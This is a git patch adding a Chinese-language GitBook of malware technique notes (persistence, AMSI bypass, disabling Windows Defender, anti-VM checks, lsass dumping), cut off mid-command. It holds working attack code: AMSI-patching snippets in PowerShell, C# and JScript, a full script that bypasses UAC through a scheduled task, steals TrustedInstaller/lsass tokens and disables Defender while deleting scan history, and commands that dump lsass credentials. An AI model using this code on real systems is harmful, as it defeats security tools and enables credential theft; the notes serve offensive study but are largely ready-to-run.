From 2143326028cfd56c5cb19e1f9be0328afc117584 Mon Sep 17 00:00:00 2001 From: 287182701 <287182701@qq.com> Date: Sun, 16 May 2021 17:08:17 +0000 Subject: [PATCH] GitBook: [main] 92 pages modified --- README.md | 11 + SUMMARY.md | 136 ++ amsi/bypass-amsi.md | 85 + anti-analysis/anti-vm-sandbox.md | 79 + disable-av/disable-wd.md | 129 ++ dump/bsod.md | 6 + dump/comsvcs.dll.md | 8 + dump/dumpert.md | 6 + dump/hibernation.md | 6 + dump/ppldump.md | 6 + dump/procdump.md | 10 + dump/processdump.exe.md | 13 + dump/shellcode.md | 6 + dump/silentprocessexit.md | 6 + dump/sqldumper.md | 17 + dump/task-manager-process-explorer.md | 6 + dump/untitled.md | 180 ++ dump/winpmem.md | 6 + file/chm/README.md | 2 + file/chm/phishing-chm.md | 28 + file/lnk/README.md | 8 + file/lnk/phishing-lnk.md | 19 + file/office.md | 20 + file/pe.md | 8 + get-password/inject-mstsc.exe.md | 6 + get-password/mimikatz.md | 6 + get-password/nplogonnotify.md | 6 + get-password/smb.md | 10 + get-password/tickets.md | 6 + inject/inject.md | 8 + lateral-movement/dcom.md | 2 + lateral-movement/hash.md | 2 + lateral-movement/kerberos-tickets.md | 2 + lateral-movement/rpc.md | 2 + lateral-movement/wmi.md | 2 + persistence/bits-jobs/README.md | 2 + persistence/bits-jobs/bits.md | 18 + persistence/com-hijack/README.md | 2 + persistence/com-hijack/com-hijack.md | 100 + persistence/dll-hijack/README.md | 2 + persistence/dll-hijack/hijack-.net-program.md | 57 + .../dll-hijack/hijack-autorun-programs.md | 1603 +++++++++++++++++ .../image-file-execution-options/README.md | 2 + .../image-file-execution-options.md | 32 + persistence/office/README.md | 2 + persistence/office/com-hijack.md | 23 + .../office/macro-enabled-add-in-file.md | 41 + persistence/office/vsto.md | 8 + persistence/office/wll-xll.md | 28 + persistence/rootkit/README.md | 2 + persistence/rootkit/rootkit.md | 26 + persistence/schtasks/README.md | 2 + persistence/schtasks/add-schtasks.md | 24 + persistence/service/README.md | 2 + persistence/service/edit-service.md | 16 + persistence/service/hide-service.md | 20 + persistence/service/hijack-service.md | 12 + persistence/service/new-service.md | 18 + persistence/startup/README.md | 2 + persistence/startup/folder.md | 11 + persistence/startup/registry.md | 78 + persistence/uncatelogued/README.md | 2 + persistence/uncatelogued/addmonitor.md | 34 + .../uncatelogued/appinit-dlls-inject.md | 14 + persistence/uncatelogued/bios.md | 12 + persistence/uncatelogued/command-processor.md | 10 + .../uncatelogued/hijack-update-program.md | 10 + persistence/uncatelogued/laps.md | 12 + .../uncatelogued/powershell-profile.md | 31 + persistence/uncatelogued/replace-file.md | 19 + persistence/uncatelogued/screen-save.md | 20 + persistence/uncatelogued/sdb.md | 10 + persistence/uncatelogued/sethc.exe.md | 15 + persistence/uncatelogued/ssp-dll.md | 10 + persistence/uncatelogued/uwp.md | 25 + persistence/uncatelogued/w32time.md | 205 +++ persistence/uncatelogued/waitfor.md | 19 + persistence/uncatelogued/windows-telemetry.md | 20 + persistence/user/README.md | 2 + persistence/user/add-user.md | 176 ++ persistence/user/hide-user.md | 158 ++ persistence/wmi/README.md | 2 + persistence/wmi/wmi-event.md | 109 ++ privilege-escalation/bug.md | 2 + privilege-escalation/untitled-4.md | 2 + privilege-escalation/wrong-config.md | 2 + process/creat-new-process.md | 12 + rats/hidden-remote.md | 14 + rats/stealer/README.md | 2 + rats/stealer/shu-ru-fa.md | 6 + tips/some-tips.md | 14 + tools/untitled.md | 2 + 92 files changed, 3957 insertions(+) create mode 100644 SUMMARY.md create mode 100644 amsi/bypass-amsi.md create mode 100644 anti-analysis/anti-vm-sandbox.md create mode 100644 disable-av/disable-wd.md create mode 100644 dump/bsod.md create mode 100644 dump/comsvcs.dll.md create mode 100644 dump/dumpert.md create mode 100644 dump/hibernation.md create mode 100644 dump/ppldump.md create mode 100644 dump/procdump.md create mode 100644 dump/processdump.exe.md create mode 100644 dump/shellcode.md create mode 100644 dump/silentprocessexit.md create mode 100644 dump/sqldumper.md create mode 100644 dump/task-manager-process-explorer.md create mode 100644 dump/untitled.md create mode 100644 dump/winpmem.md create mode 100644 file/chm/README.md create mode 100644 file/chm/phishing-chm.md create mode 100644 file/lnk/README.md create mode 100644 file/lnk/phishing-lnk.md create mode 100644 file/office.md create mode 100644 file/pe.md create mode 100644 get-password/inject-mstsc.exe.md create mode 100644 get-password/mimikatz.md create mode 100644 get-password/nplogonnotify.md create mode 100644 get-password/smb.md create mode 100644 get-password/tickets.md create mode 100644 inject/inject.md create mode 100644 lateral-movement/dcom.md create mode 100644 lateral-movement/hash.md create mode 100644 lateral-movement/kerberos-tickets.md create mode 100644 lateral-movement/rpc.md create mode 100644 lateral-movement/wmi.md create mode 100644 persistence/bits-jobs/README.md create mode 100644 persistence/bits-jobs/bits.md create mode 100644 persistence/com-hijack/README.md create mode 100644 persistence/com-hijack/com-hijack.md create mode 100644 persistence/dll-hijack/README.md create mode 100644 persistence/dll-hijack/hijack-.net-program.md create mode 100644 persistence/dll-hijack/hijack-autorun-programs.md create mode 100644 persistence/image-file-execution-options/README.md create mode 100644 persistence/image-file-execution-options/image-file-execution-options.md create mode 100644 persistence/office/README.md create mode 100644 persistence/office/com-hijack.md create mode 100644 persistence/office/macro-enabled-add-in-file.md create mode 100644 persistence/office/vsto.md create mode 100644 persistence/office/wll-xll.md create mode 100644 persistence/rootkit/README.md create mode 100644 persistence/rootkit/rootkit.md create mode 100644 persistence/schtasks/README.md create mode 100644 persistence/schtasks/add-schtasks.md create mode 100644 persistence/service/README.md create mode 100644 persistence/service/edit-service.md create mode 100644 persistence/service/hide-service.md create mode 100644 persistence/service/hijack-service.md create mode 100644 persistence/service/new-service.md create mode 100644 persistence/startup/README.md create mode 100644 persistence/startup/folder.md create mode 100644 persistence/startup/registry.md create mode 100644 persistence/uncatelogued/README.md create mode 100644 persistence/uncatelogued/addmonitor.md create mode 100644 persistence/uncatelogued/appinit-dlls-inject.md create mode 100644 persistence/uncatelogued/bios.md create mode 100644 persistence/uncatelogued/command-processor.md create mode 100644 persistence/uncatelogued/hijack-update-program.md create mode 100644 persistence/uncatelogued/laps.md create mode 100644 persistence/uncatelogued/powershell-profile.md create mode 100644 persistence/uncatelogued/replace-file.md create mode 100644 persistence/uncatelogued/screen-save.md create mode 100644 persistence/uncatelogued/sdb.md create mode 100644 persistence/uncatelogued/sethc.exe.md create mode 100644 persistence/uncatelogued/ssp-dll.md create mode 100644 persistence/uncatelogued/uwp.md create mode 100644 persistence/uncatelogued/w32time.md create mode 100644 persistence/uncatelogued/waitfor.md create mode 100644 persistence/uncatelogued/windows-telemetry.md create mode 100644 persistence/user/README.md create mode 100644 persistence/user/add-user.md create mode 100644 persistence/user/hide-user.md create mode 100644 persistence/wmi/README.md create mode 100644 persistence/wmi/wmi-event.md create mode 100644 privilege-escalation/bug.md create mode 100644 privilege-escalation/untitled-4.md create mode 100644 privilege-escalation/wrong-config.md create mode 100644 process/creat-new-process.md create mode 100644 rats/hidden-remote.md create mode 100644 rats/stealer/README.md create mode 100644 rats/stealer/shu-ru-fa.md create mode 100644 tips/some-tips.md create mode 100644 tools/untitled.md diff --git a/README.md b/README.md index e69de29..4a51392 100644 --- a/README.md +++ b/README.md @@ -0,0 +1,11 @@ +# 恶意软件学习笔记 + +2021年,给自己挖一个新坑。 + +在这里整理自己学习恶意软件分析以来学到的东西,同时存放一些从各个地方看到的技巧。 + +希望在新的一年里,能够多多进步。 + +备注: +所有示例中,均使用“qwqdanchun”作为可以随意起名的部分,各负载地址均为”C:\Temp\qwqdanchun.\*”。 + diff --git a/SUMMARY.md b/SUMMARY.md new file mode 100644 index 0000000..9621e3b --- /dev/null +++ b/SUMMARY.md @@ -0,0 +1,136 @@ +# Table of contents + +* [恶意软件学习笔记](README.md) + +## 权限维持 + +* [服务](persistence/service/README.md) + * [新建服务](persistence/service/new-service.md) + * [修改服务](persistence/service/edit-service.md) + * [隐藏服务](persistence/service/hide-service.md) + * [劫持服务](persistence/service/hijack-service.md) +* [启动项](persistence/startup/README.md) + * [注册表](persistence/startup/registry.md) + * [文件夹](persistence/startup/folder.md) +* [用户账户](persistence/user/README.md) + * [新建用户](persistence/user/add-user.md) + * [隐藏用户](persistence/user/hide-user.md) +* [DLL劫持](persistence/dll-hijack/README.md) + * [劫持自启动程序](persistence/dll-hijack/hijack-autorun-programs.md) + * [劫持.NET程序](persistence/dll-hijack/hijack-.net-program.md) +* [COM劫持](persistence/com-hijack/README.md) + * [COM劫持](persistence/com-hijack/com-hijack.md) +* [映像劫持](persistence/image-file-execution-options/README.md) + * [映像劫持](persistence/image-file-execution-options/image-file-execution-options.md) +* [计划任务](persistence/schtasks/README.md) + * [新建任务](persistence/schtasks/add-schtasks.md) +* [WMI](persistence/wmi/README.md) + * [WMI事件](persistence/wmi/wmi-event.md) +* [Office](persistence/office/README.md) + * [VSTO](persistence/office/vsto.md) + * [WLL/XLL](persistence/office/wll-xll.md) + * [模板文件](persistence/office/macro-enabled-add-in-file.md) + * [COM劫持](persistence/office/com-hijack.md) +* [BITS Jobs](persistence/bits-jobs/README.md) + * [BITS](persistence/bits-jobs/bits.md) +* [Rootkit](persistence/rootkit/README.md) + * [Rootkit](persistence/rootkit/rootkit.md) +* [未分类](persistence/uncatelogued/README.md) + * [Windows Telemetry](persistence/uncatelogued/windows-telemetry.md) + * [替换文件](persistence/uncatelogued/replace-file.md) + * [AppInit\_DLLs注入](persistence/uncatelogued/appinit-dlls-inject.md) + * [粘滞键](persistence/uncatelogued/sethc.exe.md) + * [cmd启动劫持](persistence/uncatelogued/command-processor.md) + * [屏幕保护](persistence/uncatelogued/screen-save.md) + * [注册SSP DLL](persistence/uncatelogued/ssp-dll.md) + * [AddMonitor](persistence/uncatelogued/addmonitor.md) + * [滥用POWERSHELL配置文件](persistence/uncatelogued/powershell-profile.md) + * [W32Time](persistence/uncatelogued/w32time.md) + * [UWP](persistence/uncatelogued/uwp.md) + * [Waitfor](persistence/uncatelogued/waitfor.md) + * [Bios](persistence/uncatelogued/bios.md) + * [劫持更新程序](persistence/uncatelogued/hijack-update-program.md) + * [利用LAPS](persistence/uncatelogued/laps.md) + * [SDB文件](persistence/uncatelogued/sdb.md) + +## 提权 + +* [UAC Bypass](privilege-escalation/untitled-4.md) +* [漏洞](privilege-escalation/bug.md) +* [错误配置](privilege-escalation/wrong-config.md) + +## 横向移动 + +* [WMI](lateral-movement/wmi.md) +* [RPC](lateral-movement/rpc.md) +* [DCOM](lateral-movement/dcom.md) +* [HASH](lateral-movement/hash.md) +* [Kerberos tickets](lateral-movement/kerberos-tickets.md) + +## 文件结构 + +* [Office](file/office.md) +* [LNK](file/lnk/README.md) + * [钓鱼lnk](file/lnk/phishing-lnk.md) +* [PE](file/pe.md) +* [CHM](file/chm/README.md) + * [钓鱼chm](file/chm/phishing-chm.md) + +## 注入 + +* [注入](inject/inject.md) + +## 反分析 + +* [反虚拟机/沙盒](anti-analysis/anti-vm-sandbox.md) + +## 获取用户密码或hash + +* [SMB](get-password/smb.md) +* [注入mstsc.exe](get-password/inject-mstsc.exe.md) +* [Mimikatz](get-password/mimikatz.md) +* [NPLogonNotify](get-password/nplogonnotify.md) +* [Tickets](get-password/tickets.md) + +## 进程链 + +* [启动进程](process/creat-new-process.md) + +## 关闭杀软 + +* [关闭WD](disable-av/disable-wd.md) + +## AMSI + +* [绕过AMSI](amsi/bypass-amsi.md) + +## Dump内存 + +* [MiniDumpWriteDump](dump/untitled.md) +* [Shellcode](dump/shellcode.md) +* [SilentProcessExit](dump/silentprocessexit.md) +* [procdump](dump/procdump.md) +* [Task Manager/Process Explorer](dump/task-manager-process-explorer.md) +* [Sqldumper](dump/sqldumper.md) +* [comsvcs.dll](dump/comsvcs.dll.md) +* [WinPmem](dump/winpmem.md) +* [ProcessDump.exe](dump/processdump.exe.md) +* [Dumpert](dump/dumpert.md) +* [BSOD](dump/bsod.md) +* [PPLdump](dump/ppldump.md) +* [Hibernation](dump/hibernation.md) + +## 木马分析 + +* [Stealer](rats/stealer/README.md) + * [输入法](rats/stealer/shu-ru-fa.md) +* [Hidden Remote](rats/hidden-remote.md) + +## 常用工具 + +* [Untitled](tools/untitled.md) + +## 鬼知道有什么用的小知识 + +* [鬼知道有什么用的小知识](tips/some-tips.md) + diff --git a/amsi/bypass-amsi.md b/amsi/bypass-amsi.md new file mode 100644 index 0000000..a51aec3 --- /dev/null +++ b/amsi/bypass-amsi.md @@ -0,0 +1,85 @@ +# 绕过AMSI + +Powershell: + +```text +$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) +``` + +c\#: + +```csharp +public class Amsi + { + public static void Bypass() + { + string x64 = "uFcA"; + x64 = x64 + "B4DD"; + string x86 = "uFcAB4"; + x86 = x86 + "DCGAA="; + if (is64Bit()) + PatchA(Convert.FromBase64String(x64)); + else + PatchA(Convert.FromBase64String(x86)); + } + private static void PatchA(byte[] patch) + { + try + { + string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw=")); + var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll + string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")); + var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer + uint oldProtect; + Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect); + Marshal.Copy(patch, 0, addr, patch.Length); + } + catch (Exception e) + { + Console.WriteLine(" [x] {0}", e.Message); + Console.WriteLine(" [x] {0}", e.InnerException); + } + } + private static bool is64Bit() + { + bool is64Bit = true; + if (IntPtr.Size == 4) + is64Bit = false; + return is64Bit; + } + } + class Win32 + { + public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect + public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); + #region CreateAPI + [DllImport("kernel32", SetLastError = true)] + public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); + [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] + public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); + public static CreateApi LoadApi(string name, string method) + { + return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)); + } + #endregion + } +``` + +js: + +```javascript +var sh=new ActiveXObject('WScript.Shell'); +var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"; +try{ + var AmsiEnable=sh.RegRead(key); + if(AmsiEnable!=0) { + throw new Error(1,''); + } +} catch(e) { + sh.RegWrite(key,0,"REG_DWORD"); + sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1); + sh.RegWrite(key,1,"REG_DWORD"); + WScript.Quit(1); +} +``` + diff --git a/anti-analysis/anti-vm-sandbox.md b/anti-analysis/anti-vm-sandbox.md new file mode 100644 index 0000000..c75797d --- /dev/null +++ b/anti-analysis/anti-vm-sandbox.md @@ -0,0 +1,79 @@ +# 反虚拟机/沙盒 + +c\#\(WMI检测内存\): + +```csharp +using System; +using System.Management; +using System.Threading; + +namespace Program +{ + class Anti_Analysis + { + public static void RunAntiAnalysis() + { + if (isVM()) + { + Environment.FailFast(null); + } + Thread.Sleep(1000); + } + public static bool isVM() + { + SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory"); + //SelectQuery selectQuery = new SelectQuery("Select * from CIM_Memory"); + ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery); + int i = 0; + foreach (ManagementObject DeviceID in searcher.Get()) + i++; + return (i == 0); + } + } +} +``` + +c++\(即插即用设备\) + +{% embed url="https://github.com/LordNoteworthy/al-khaser" caption="" %} + +```cpp +#include +#include +#include + +int main() +{ + DISPLAY_DEVICE dd; + dd.cb = sizeof(dd); + int deviceIndex = 0; + while (EnumDisplayDevices(0, deviceIndex, &dd, 0)) + { + std::wstring deviceName = dd.DeviceName; + int monitorIndex = 0; + while (EnumDisplayDevices(deviceName.c_str(), monitorIndex, &dd, 0)) + { + int flag = strlen((const char*)dd.DeviceString); + if (flag > 2) { + std::wcout << "this is vm"; + } + else + { + std::wcout << "this is not vm"; + } + ++monitorIndex; + } + ++deviceIndex; + } + return 0; +} +``` + +{% embed url="https://github.com/a0rtega/pafish" caption="" %} + +测试工具: + +{% embed url="https://github.com/LordNoteworthy/al-khaser" caption="" %} + +{% embed url="https://github.com/a0rtega/pafish" caption="" %} + diff --git a/disable-av/disable-wd.md b/disable-av/disable-wd.md new file mode 100644 index 0000000..7159169 --- /dev/null +++ b/disable-av/disable-wd.md @@ -0,0 +1,129 @@ +# 关闭WD + +```text +@(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16 || configure just auto-actions OFF; toggle icon on ltsb +set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1] +sp 'HKCU:\Volatile Environment' 'ToggleDefender' @' +if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'} + +## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2) +if ($env:1 -ne 6 -and $env:1 -ne 7) { + $choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51) + if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP} +} + +## Without the dialog prompt above will toggle automatically +if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE } + +## Comment to not relaunch systray icon +start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1 + +## Comment to not hide per-user toggle notifications +$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance' +ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0 +sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0} + +## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass? +$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup') +$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition + +## Cascade elevation +$u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3} + +## Reload from volatile registry as needed +$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39 +$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer' +$script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script + +## 0: limited-user: must runas +if ($u -eq 0) { + start powershell -args $script -verb runas -win 1; break +} + +## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas +if ($u -eq 1) { + if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break} + sp hkcu:\environment windir $('powershell '+$script+' #') + $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1} + if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break +} + +## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610] +if ($u -eq 2) { + $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_, + 1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0) + $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I) + $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4) + 1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size + nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal"); + $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z) + 'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}} + $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1 + $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2])) + $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600 + $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break +} + +## Create registry paths +$wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' +' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null} + +## Toggle Defender +if ($env:1 -eq 7) { + rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0 + rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0 + rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0 + rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0 + rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0 + rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 + rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 + sc.exe config windefend depend= RpcSs + net1 start windefend + kill -Force -Name MpCmdRun -ea 0 + start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1 +} else { + sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0 + sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0 + sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0 + sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0 + sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0 + sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0 + sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0 + net1 stop windefend + sc.exe config windefend depend= RpcSs-TOGGLE + kill -Name MpCmdRun -Force -ea 0 + start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1 + del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0 ## Commented = keep scan history + del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0 +} + +## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT +sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0 ## Auto Actions OFF +# rp $wdp DisableRoutinelyTakingAction -Force -ea 0 ## Auto Actions ON [default] +sp $wdp PUAProtection 1 -Type Dword -Force -ea 0 ## Potential Unwanted Apps ON +rp $wdp PUAProtection -Force -ea 0 ## Potential Unwanted Apps OFF [default] +sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0 ## Cloud blocking level HIGH +rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0 ## Cloud blocking level LOW [default] +sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0 ## Cloud protection ADVANCED +rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0 ## Cloud protection BASIC [default] +sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0 ## Sample Submission ALWAYS-PROMPT +rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0 ## Sample Submission AUTOMATIC [default] +sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0 ## Scan incoming file only +rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0 ## Scan incoming and outgoing file [default] + +## Uncomment to close windows built-in lame uac bpass and/or reset uac +# if ($flaw.Actions.Item(1).Path -ilike '*windir*') { +# $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe' ## %windir%\system32\cleanmgr.exe [default] +# $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null) ## UAC silent bpass mitigation +# $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' +# sp $uac EnableLUA 1 -Type Dword -Force -ea 0 ## UAC enable +# sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0 ## UAC always notify - bpassable otherwise +# sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0 ## UAC secure - prevent automation +# } + +'@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender) +#-_-# hybrid script, can be pasted directly into powershell console +``` + +来源:[https://pastebin.com/raw/hLsCCZQY](https://pastebin.com/raw/hLsCCZQY) + diff --git a/dump/bsod.md b/dump/bsod.md new file mode 100644 index 0000000..1b1822f --- /dev/null +++ b/dump/bsod.md @@ -0,0 +1,6 @@ +# BSOD + +参考链接: + +{% embed url="https://www.mrwu.red/web/2000.html" caption="" %} + diff --git a/dump/comsvcs.dll.md b/dump/comsvcs.dll.md new file mode 100644 index 0000000..3fcf24c --- /dev/null +++ b/dump/comsvcs.dll.md @@ -0,0 +1,8 @@ +# comsvcs.dll + +powershell: + +```text +.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\temp\lsass.dmp full +``` + diff --git a/dump/dumpert.md b/dump/dumpert.md new file mode 100644 index 0000000..5546807 --- /dev/null +++ b/dump/dumpert.md @@ -0,0 +1,6 @@ +# Dumpert + +参考链接: + +{% embed url="https://github.com/outflanknl/Dumpert" caption="" %} + diff --git a/dump/hibernation.md b/dump/hibernation.md new file mode 100644 index 0000000..22e63ed --- /dev/null +++ b/dump/hibernation.md @@ -0,0 +1,6 @@ +# Hibernation + +参考链接: + +{% embed url="https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps" caption="" %} + diff --git a/dump/ppldump.md b/dump/ppldump.md new file mode 100644 index 0000000..866d841 --- /dev/null +++ b/dump/ppldump.md @@ -0,0 +1,6 @@ +# PPLdump + +参考链接: + +{% embed url="https://github.com/itm4n/PPLdump" caption="" %} + diff --git a/dump/procdump.md b/dump/procdump.md new file mode 100644 index 0000000..012ef88 --- /dev/null +++ b/dump/procdump.md @@ -0,0 +1,10 @@ +# procdump + +```text +procdump -ma lsass.exe lsass.dmp +``` + +[http://live.sysinternals.com/procdump.exe](http://live.sysinternals.com/procdump.exe) + +[http://live.sysinternals.com/procdump64.exe](http://live.sysinternals.com/procdump64.exe) + diff --git a/dump/processdump.exe.md b/dump/processdump.exe.md new file mode 100644 index 0000000..f7933e8 --- /dev/null +++ b/dump/processdump.exe.md @@ -0,0 +1,13 @@ +# ProcessDump.exe + +## 来自Cisco Jabber + +位于`c:\program files (x86)\cisco systems\cisco jabber\x64\` + +powershell: + +```text +cd c:\program files (x86)\cisco systems\cisco jabber\x64\ +processdump.exe (ps 